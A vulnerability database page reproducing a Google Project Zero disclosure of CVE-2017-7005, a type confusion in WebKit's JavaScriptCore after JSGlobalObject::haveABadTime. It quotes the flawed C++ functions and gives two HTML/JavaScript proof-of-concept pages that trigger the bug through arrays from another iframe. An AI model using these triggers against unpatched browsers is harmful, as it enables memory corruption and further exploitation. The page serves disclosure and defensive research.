Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WebKit JSC JSGlobalObject::haveABadTime Type Confusion

šŸ—“ļøĀ 15 Jun 2017Ā 00:00:00Reported byĀ Google Security ResearchTypeĀ 
packetstorm
Ā packetstormšŸ”—Ā packetstormsecurity.comšŸ‘Ā 70Ā Views

WebKit JSC JSGlobalObject::haveABadTime Type Confusion CVE-2017-7005 causes type confusions in JavaScript arrays after JSGlobalObject::haveABadTime is called

Related
Code
ReporterTitlePublishedViews
Family
0day.today		WebKit JSC - JSGlobalObject::haveABadTime Causes Type Confusions Exploit
17 Jun 201700:00
ā€“zdt
0day.today		Sony Playstation 4 (PS4) 5.01 - WebKit (PoC) Exploit
28 Feb 201800:00
ā€“zdt
Apple		About the security content of iOS 10.3.2
15 May 201700:00
ā€“apple
Apple		About the security content of Safari 10.1.1
15 May 201700:00
ā€“apple
Apple		About the security content of tvOS 10.2.1
15 May 201700:00
ā€“apple
Apple		About the security content of iOS 10.3.2 - Apple Support
20 Jun 201710:37
ā€“apple
Apple		About the security content of tvOS 10.2.1 - Apple Support
21 Jun 201708:52
ā€“apple
Apple		About the security content of Safari 10.1.1 - Apple Support
26 Jun 201704:38
ā€“apple
Tenable Nessus		Apple TV < 10.2.1 Multiple Vulnerabilities
17 May 201700:00
ā€“nessus
Tenable Nessus		Apple iOS < 10.3.2 Multiple Vulnerabilities
18 May 201700:00
ā€“nessus
Rows per page
` WebKit: JSC: JSGlobalObject::haveABadTime causes type confusions   
  
CVE-2017-7005  
  
  
After JSGlobalObject::haveABadTime is called, the type of all JavaScript arrays(including newly created arrays) are of the same type: ArrayWithSlowPutArrayStorage. But (of course) this only affects objects that share the same JSGlobalObject. So arrays come from another JSGlobalObject can cause type confusions.  
  
void JSGlobalObject::haveABadTime(VM& vm)  
{  
...  
for (unsigned i = 0; i < NumberOfIndexingShapes; ++i)  
m_arrayStructureForIndexingShapeDuringAllocation[i].set(vm, this, originalArrayStructureForIndexingType(ArrayWithSlowPutArrayStorage)); <<-- The type of a newly created array will be ArrayWithSlowPutArrayStorage  
...  
while (!foundObjects.isEmpty()) {  
JSObject* object = asObject(foundObjects.last());  
foundObjects.removeLast();  
ASSERT(hasBrokenIndexing(object));  
object->switchToSlowPutArrayStorage(vm); <<------ switch type of an old array  
}  
}  
  
  
1. fastSlice:  
JSArray* JSArray::fastSlice(ExecState& exec, unsigned startIndex, unsigned count)  
{  
auto arrayType = indexingType();  
switch (arrayType) {  
case ArrayWithDouble:  
case ArrayWithInt32:  
case ArrayWithContiguous: {  
VM& vm = exec.vm();  
if (count >= MIN_SPARSE_ARRAY_INDEX || structure(vm)->holesMustForwardToPrototype(vm))  
return nullptr;  
  
Structure* resultStructure = exec.lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(arrayType);  
JSArray* resultArray = JSArray::tryCreateForInitializationPrivate(vm, resultStructure, count);  
if (!resultArray)  
return nullptr;  
  
auto& resultButterfly = *resultArray->butterfly();  
if (arrayType == ArrayWithDouble)  
memcpy(resultButterfly.contiguousDouble().data(), m_butterfly.get()->contiguousDouble().data() + startIndex, sizeof(JSValue) * count);  
else  
memcpy(resultButterfly.contiguous().data(), m_butterfly.get()->contiguous().data() + startIndex, sizeof(JSValue) * count);  
resultButterfly.setPublicLength(count);  
  
return resultArray;  
}  
default:  
return nullptr;  
}  
}  
  
If |this| came from another JSGlobalObject, and |haveABadTime| was called, the type of |resultArray| will be ArrayWithSlowPutArrayStorage. It will result in a type confusion.  
  
<html>  
<body>  
<script>  
  
Array.prototype.__defineGetter__(100, () => 1);  
  
let f = document.body.appendChild(document.createElement('iframe'));  
let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320);  
  
let c = Array.prototype.slice.call(a);  
alert(c);  
  
</script>  
</body>  
</html>  
  
2. arrayProtoPrivateFuncConcatMemcpy  
EncodedJSValue JSC_HOST_CALL arrayProtoPrivateFuncConcatMemcpy(ExecState* exec)  
{  
...  
JSArray* firstArray = jsCast<JSArray*>(exec->uncheckedArgument(0));  
...  
IndexingType type = firstArray->mergeIndexingTypeForCopying(secondType);  
...  
Structure* resultStructure = exec->lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(type);  
JSArray* result = JSArray::tryCreateForInitializationPrivate(vm, resultStructure, firstArraySize + secondArraySize);  
if (!result)  
return JSValue::encode(throwOutOfMemoryError(exec, scope));  
  
if (type == ArrayWithDouble) {  
double* buffer = result->butterfly()->contiguousDouble().data();  
memcpy(buffer, firstButterfly->contiguousDouble().data(), sizeof(JSValue) * firstArraySize);  
memcpy(buffer + firstArraySize, secondButterfly->contiguousDouble().data(), sizeof(JSValue) * secondArraySize);  
} else if (type != ArrayWithUndecided) {  
WriteBarrier<Unknown>* buffer = result->butterfly()->contiguous().data();  
memcpy(buffer, firstButterfly->contiguous().data(), sizeof(JSValue) * firstArraySize);  
if (secondType != ArrayWithUndecided)  
memcpy(buffer + firstArraySize, secondButterfly->contiguous().data(), sizeof(JSValue) * secondArraySize);  
else {  
for (unsigned i = secondArraySize; i--;)  
buffer[i + firstArraySize].clear();  
}  
}  
  
result->butterfly()->setPublicLength(firstArraySize + secondArraySize);  
return JSValue::encode(result);  
}  
  
If |firstArray| came from another JSGlobalObject, and |haveABadTime| was called, the type of |result| will be ArrayWithSlowPutArrayStorage. It will result in a type confusion.  
  
PoC:  
<html>  
<body>  
<script>  
  
Array.prototype.__defineGetter__(100, () => 1);  
  
let f = document.body.appendChild(document.createElement('iframe'));  
let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);  
let b = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);  
  
let c = Array.prototype.concat.call(a, b);  
  
alert(c);  
  
</script>  
</body>  
</html>  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Jun 2017 00:00Current
8.2High risk
Vulners AI Score8.2
EPSS0.03216
webkitjscjsglobalobjecthaveabadtimetype confusionscve-2017-7005javascript arrays
70